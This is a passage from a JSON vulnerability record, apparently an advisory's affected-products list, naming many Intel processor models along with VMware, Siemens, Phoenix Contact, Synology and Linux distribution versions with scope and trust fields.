"model": "core i7", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "7560u" }, { "model": "core i7", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "5950hq" }, { "model": "xeon e5", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "2698_v3" }, { "model": "pentium j", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "j4205" }, { "model": "leap", "scope": "eq", "trust": 1.0, "vendor": "opensuse", "version": "42.2" }, { "model": "core i7", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "640lm" }, { "model": "xeon e7", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "2880_v2" }, { "model": "xeon e5", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "2667_v4" }, { "model": "core i5", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "4200u" }, { "model": "xeon", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "w5590" }, { "model": "core i3", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "4170t" }, { "model": "xeon e5 2450l v2", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": null }, { "model": "core i5", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "3360m" }, { "model": "core i5", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "4310m" }, { "model": "atom c", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "c3558" }, { "model": "core i5", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "450m" }, { "model": "core i3", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "6300" }, { "model": "core i7", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "4700hq" }, { "model": "xeon e5", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "4628l_v4" }, { "model": "xeon e5 1620 v3", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": null }, { "model": "xeon e7", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "2870" }, { "model": "xeon e7", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "8894_v4" }, { "model": "core i3", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "2130" }, { "model": "xeon e3", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "1545m_v5" }, { "model": "xeon e5", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "4610_v2" }, { "model": "xeon gold", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "6140m" }, { "model": "core i7", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "2630qm" }, { "model": "xeon e3 1240 v5", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": null }, { "model": "atom x5-e3930", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": null }, { "model": "xeon e5 2637 v4", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": null }, { "model": "core i3", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "2102" }, { "model": "atom c", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "c2750" }, { "model": "core i5", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "4590s" }, { "model": "core i5", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "2510e" }, { "model": "core i3", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "6320" }, { "model": "core i7", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "2860qm" }, { "model": "xeon e5", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "4660_v3" }, { "model": "diskstation manager", "scope": "lt", "trust": 1.0, "vendor": "synology", "version": "6.2.2-24922" }, { "model": "el ppc 1000\\/m", "scope": "eq", "trust": 1.0, "vendor": "phoenixcontact", "version": null }, { "model": "atom x3", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "c3205rk" }, { "model": "fusion", "scope": "lt", "trust": 1.0, "vendor": "vmware", "version": "8.5.9" }, { "model": "vl bpc 1000", "scope": "eq", "trust": 1.0, "vendor": "phoenixcontact", "version": null }, { "model": "core i7", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "7700k" }, { "model": "xeon", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "e7520" }, { "model": "celeron n", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "n4000" }, { "model": "core m", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "5y10c" }, { "model": "pentium n", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "n3530" }, { "model": "core i5", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "4430" }, { "model": "core i7", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "960" }, { "model": "core i3", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "4030y" }, { "model": "core i7", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "2675qm" }, { "model": "core i7", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "7700" }, { "model": "xeon e3 1285 v4", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": null }, { "model": "core i7", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "2600" }, { "model": "xeon e5", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "2660_v3" }, { "model": "xeon e5 2630l", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": null }, { "model": "xeon e7", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "8850" }, { "model": "xeon e7", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "4890_v2" }, { "model": "xeon gold", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "5115" }, { "model": "bl bpc 3000", "scope": "eq", "trust": 1.0, "vendor": "phoenixcontact", "version": null }, { "model": "xeon e3 1231 v3", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": null }, { "model": "core i5", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "3450s" }, { "model": "core i5", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "2467m" }, { "model": "core i3", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "6100" }, { "model": "core i5", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "2450p" }, { "model": "xeon", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "l5630" }, { "model": "core i5", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "3570s" }, { "model": "atom z", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "z3736f" }, { "model": "xeon e5 2603", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": null }, { "model": "core i7", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "7600u" }, { "model": "xeon", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "lc5518" }, { "model": "core i5", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "3470t" }, { "model": "core i7", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "3517u" }, { "model": "xeon e7", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "8870_v3" }, { "model": "xeon phi", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "7290f" }, { "model": "core i3", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "6006u" }, { "model": "core i5", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "5350u" }, { "model": "xeon e5 2650", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": null }, { "model": "xeon e5", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "2670" }, { "model": "core i3", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "4370" }, { "model": "core i3", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "2120t" }, { "model": "xeon e5", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "2683_v4" }, { "model": "xeon e7", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "4850_v2" }, { "model": "core i7", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "4712hq" }, { "model": "core i7", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "5650u" }, { "model": "core i5", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "5257u" }, { "model": "xeon gold", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "6142" }, { "model": "core i3", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "4100u" }, { "model": "xeon phi", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "7230" }, { "model": "xeon e5", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "2670_v3" }, { "model": "celeron n", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "n2830" }, { "model": "core i7", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "4790k" }, { "model": "core i3", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "3250" }, { "model": "core i7", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "660ue" }, { "model": "core i5", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "6585r" }, { "model": "core i7", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "620um" }, { "model": "core i5", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "8350u" }, { "model": "core i7", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "990x" }, { "model": "core i7", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "4770s" }, { "model": "xeon e5", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "2665" }, { "model": "vl2 bpc 3000", "scope": "eq", "trust": 1.0, "vendor": "phoenixcontact", "version": null }, { "model": "core i5", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "750s" }, { "model": "xeon platinum", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "8176m" }, { "model": "core i7", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "5550u" }, { "model": "xeon gold", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "6132" }, { "model": "vl ppc 2000", "scope": "eq", "trust": 1.0, "vendor": "phoenixcontact", "version": null }, { "model": "xeon e3 1280", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": null }, { "model": "xeon e5 2450l", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": null }, { "model": "core i3", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "4340te" }, { "model": "cortex-x1", "scope": "eq", "trust": 1.0, "vendor": "arm", "version": null }, { "model": "celeron j", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "j4105" }, { "model": "core i5", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "4590" }, { "model": "core i7", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "3555le" }, { "model": "xeon e5", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "2667_v3" }, { "model": "xeon", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "x3440" }, { "model": "celeron n", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "n2840" }, { "model": "xeon gold", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "6126" }, { "model": "xeon e3 1125c v2", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": null }, { "model": "xeon e3 1225 v6", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": null }, { "model": "xeon e3 1275 v3", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": null }, { "model": "core i3", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "2330e" }, { "model": "xeon e5", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "4669_v3" }, { "model": "xeon", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "l3406" }, { "model": "xeon e3 1505l v6", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": null }, { "model": "atom c", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "c3950" }, { "model": "core i5", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "430m" }, { "model": "atom z", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "z2520" }, { "model": "simatic winac rtx \\ 2010", "scope": "lt", "trust": 1.0, "vendor": "siemens", "version": "2010" }, { "model": "xeon", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "x3430" }, { "model": "xeon e3", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "1578l_v5" }, { "model": "core i5", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "4200m" }, { "model": "core i5", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "4570s" }, { "model": "xeon e5", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "2699r_v4" }, { "model": "xeon e5 2628l v3", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": null }, { "model": "xeon", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "e5603" }, { "model": "xeon silver", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "4108" }, { "model": "core i3", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "540" }, { "model": "core i5", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "4670s" }, { "model": "xeon e5 1630 v3", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": null }, { "model": "xeon silver", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "4116" }, { "model": "atom c", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "c3750" }, { "model": "core i5", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "2500k" }, { "model": "xeon", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "e5530" }, { "model": "local service management system", "scope": "eq", "trust": 1.0, "vendor": "oracle", "version": "13.2" }, { "model": "core i7", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "3635qm" }, { "model": "xeon e5", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "2658" }, { "model": "core i5", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "4670t" }, { "model": "atom z", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "z3560" }, { "model": "celeron n", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "n3050" }, { "model": "core i7", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "720qm" }, { "model": "core i5", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "3340" }, { "model": "core i5", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "3340m" }, { "model": "core i3", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "6100h" }, { "model": "atom c", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "c2738" }, { "model": "core i5", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "6442eq" }, { "model": "core i7", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "4790s" }, { "model": "core i3", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "2377m" }, { "model": "core i7", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "880" }, { "model": "core i7", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "7500u" }, { "model": "core i7", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "860" }, { "model": "pentium n", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "n3510" }, { "model": "core i3", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "2310e" }, { "model": "vl bpc 3000", "scope": "eq", "trust": 1.0, "vendor": "phoenixcontact", "version": null }, { "model": "atom e", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "e3815" }, { "model": "xeon e5 2648l v4", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": null }, { "model": "atom z", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "z2420" }, { "model": "vs360hd", "scope": "eq", "trust": 1.0, "vendor": "synology", "version": null }, { "model": "atom x3", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "c3295rk" }, { "model": "celeron n", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "n2805" }, { "model": "core i5", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "470um" }, { "model": "xeon e5 1620", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": null }, { "model": "xeon e5 2640 v2", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": null }, { "model": "core i5", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "2410m" }, { "model": "ubuntu linux", "scope": "eq", "trust": 1.0, "vendor": "canonical", "version": "17.10" }, { "model": "xeon e3 1235l v5", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": null }, { "model": "core i5", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "520um" }, { "model": "xeon e5 2643 v2", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": null }, { "model": "xeon", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "x5670" }, { "model": "xeon e7", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "8891_v2" }, { "model": "bl ppc 1000", "scope": "eq", "trust": 1.0, "vendor": "phoenixcontact", "version": null }, { "model": "core i5", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "4440" }, { "model": "core i7", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "3720qm" }, { "model": "xeon", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "e7530" }, { "model": "xeon e3 1240", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": null }, { "model": "xeon e3 1220 v3", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": null }, { "model": "core i3", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "2120" }, { "model": "core i5", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "4400e" }, { "model": "core i7", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "3770s" }, { "model": "atom x5-e3940", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": null }, { "model": "core i3", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "4030u" }, { "model": "xeon e5 2648l", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": null }, { "model": "core i5", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "4340m" }, { "model": "xeon e5", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "2687w_v4" }, { "model": "workstation", "scope": "gte", "trust": 1.0, "vendor": "vmware", "version": "12.0.0" }, { "model": "xeon e5 1650 v4", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": null }, { "model": "xeon e3 1235", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": null }, { "model": "xeon e5 2430l", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": null }, { "model": "core i5", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "2400s" }, { "model": "xeon e7", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "4880_v2" }, { "model": "core i5", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "6300u" }, { "model": "core i5", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "5200u" }, { "model": "xeon e7", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "8837" }, { "model": "core i7", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "5557u" }, { "model": "leap", "scope": "eq", "trust": 1.0, "vendor": "opensuse", "version": "42.3" }, { "model": "simatic itc2200 pro", "scope": "lt", "trust": 1.0, "vendor": "siemens", "version": "3.1" }, { "model": "core i7", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "4750hq" }, { "model": "core i3", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "6098p" }, { "model": "xeon e5", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "2690_v2" }, { "model": "xeon e5", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "4624l_v2" }, { "model": "btc14", "scope": "eq", "trust": 1.0, "vendor": "pepperl fuchs", "version": null }, { "model": "fusion", "scope": "gte", "trust": 1.0, "vendor": "vmware", "version": "8.0.0" }, { "model": "core i5", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "520m" }, { "model": "core i5", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "3320m" }, { "model": "core i7", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "4558u" }, { "model": "core i5", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "3427u" }, { "model": "pentium j", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "j2850" }, { "model": "xeon e3 1270 v5", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": null }, { "model": "celeron j", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "j3160" }, { "model": "core i5", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "6260u" }, { "model": "xeon e5", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "2660" }, { "model": "xeon", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "x5690" }, { "model": "xeon e5", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "2698_v4" }, { "model": "xeon e5 2450", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": null }, { "model": "xeon e5 2438l v3", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": null }, { "model": "core i5", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "4258u" }, { "model": "core i3", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "2330m" }, { "model": "core i3", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "4010u" }, { "model": "core i5", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "4570t" }, { "model": "xeon e7", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "8850_v2" }, { "model": "vl2 ppc 2000", "scope": "eq", "trust": 1.0, "vendor": "phoenixcontact", "version": null }, { "model": "xeon e7", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "4850_v3" }, { "model": "xeon phi", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "7230f" }, { "model": "xeon e5 2630l v2", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": null }, { "model": "core i5", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "4460" }, { "model": "xeon e3 1265l v4", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": null }, { "model": "xeon phi", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "7295" }, { "model": "xeon", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "x3460" }, { "model": "core i7", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "7567u" }, { "model": "xeon e5", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "4640_v2" }, { "model": "ubuntu linux", "scope": "eq", "trust": 1.0, "vendor": "canonical", "version": "16.04" }, { "model": "xeon", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "x3480" }, { "model": "xeon", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "w3690" }, { "model": "atom x3", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "c3265rk" }, { "model": "xeon e3 1280 v6", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": null }, { "model": "xeon", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "e5607" }, { "model": "xeon e5 2623 v3", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": null }, { "model": "xeon e5", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "2680_v4" }, { "model": "core i7", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "940xm" }, { "model": "xeon e5", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "4650_v3" }, { "model": "core i3", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "2340ue" }, { "model": "xeon gold", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "6134m" }, { "model": "core i3", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "5010u" }, { "model": "xeon e5", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "4620_v2" }, { "model": "core i5", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "4300u" }, { "model": "xeon e3 1220", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": null }, { "model": "core i3", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "4100m" }, { "model": "core i7", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "4770" }, { "model": "xeon gold", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "6126f" }, { "model": "core i5", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "3550" }, { "model": "core i7", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "3610qe" }, { "model": "xeon silver", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "4112" }, { "model": "hci", "scope": "eq", "trust": 1.0, "vendor": "netapp", "version": null }, { "model": "vl2 bpc 7000", "scope": "eq", "trust": 1.0, "vendor": "phoenixcontact", "version": null }, { "model": "xeon e3 1265l v2", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": null }, { "model": "atom z", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "z2480" }, { "model": "atom z", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "z3735f" }, { "model": "core i5", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "2500s" }, { "model": "xeon e5", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "2667" }, { "model": "bl bpc 3001", "scope": "eq", "trust": 1.0, "vendor": "phoenixcontact", "version": null }, { "model": "core i5", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "3570t" }, { "model": "core i7", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "2670qm" }, { "model": "xeon e5", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "2699_v3" }, { "model": "xeon e3 1240l v3", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": null }, { "model": "atom c", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "c2550" }, { "model": "xeon", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "e5507" }, { "model": "atom z", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "z3740d" }, { "model": "xeon e5", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "4620_v3" }, { "model": "core i7", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "660um" }, { "model": "core i7", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "4850hq" }, { "model": "xeon e5 2603 v2", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": null }, { "model": "core i7", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "2920xm" }, { "model": "xeon e5 2609 v2", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": null }, { "model": "xeon e3 1245 v3", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": null }, { "model": "atom c", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "c3830" }, { "model": "linux enterprise software development kit", "scope": "eq", "trust": 1.0, "vendor": "suse", "version": "11" }, { "model": "atom z", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "z3735d" }, { "model": "core i7", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "3632qm" }, { "model": "xeon e5", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "2658_v3" }, { "model": "xeon phi", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "7285" }, { "model": "simatic itc1500 pro", "scope": "lt", "trust": 1.0, "vendor": "siemens", "version": "3.1" }, { "model": "xeon e5 2420 v2", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": null }, { "model": "core i5", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "4570te" }, { "model": "core i5", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "6440eq" }, { "model": "xeon e5 1630 v4", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": null }, { "model": "xeon e7", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "8880_v3" }, { "model": "core i5", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "2500t" }, { "model": "xeon e3", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "1515m_v5" }, { "model": "xeon gold", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "6150" }, { "model": "xeon", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "lc5528" }, { "model": "xeon e3 1220 v6", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": null }, { "model": "xeon e5 2650 v3", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": null }, { "model": "bl2 bpc 7000", "scope": "eq", "trust": 1.0, "vendor": "phoenixcontact", "version": null }, { "model": "xeon e5 1620 v2", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": null }, { "model": "simatic winac rtx \\ 2010", "scope": "eq", "trust": 1.0, "vendor": "siemens", "version": "2010" }, { "model": "core i5", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "655k" }, { "model": "core i3", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "4370t" }, { "model": "atom x3", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "c3230rk" }, { "model": "core i5", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "4200y" }, { "model": "xeon", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "l7545" }, { "model": "core i5", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "4440s" }, { "model": "core i5", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "4570" }, { "model": "xeon e7", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "8893_v4" }, { "model": "core i7", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "4700eq" }, { "model": "xeon", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "x7550" }, { "model": "atom c", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "c2558" }, { "model": "xeon e3 1275 v5", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": null }, { "model": "xeon e5 2637", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": null }, { "model": "xeon phi", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "7250f" }, { "model": "xeon e7", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "2830" }, { "model": "xeon e3", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "1505m_v6" }, { "model": "xeon e5", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "4610_v3" }, { "model": "core i3", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "3217u" 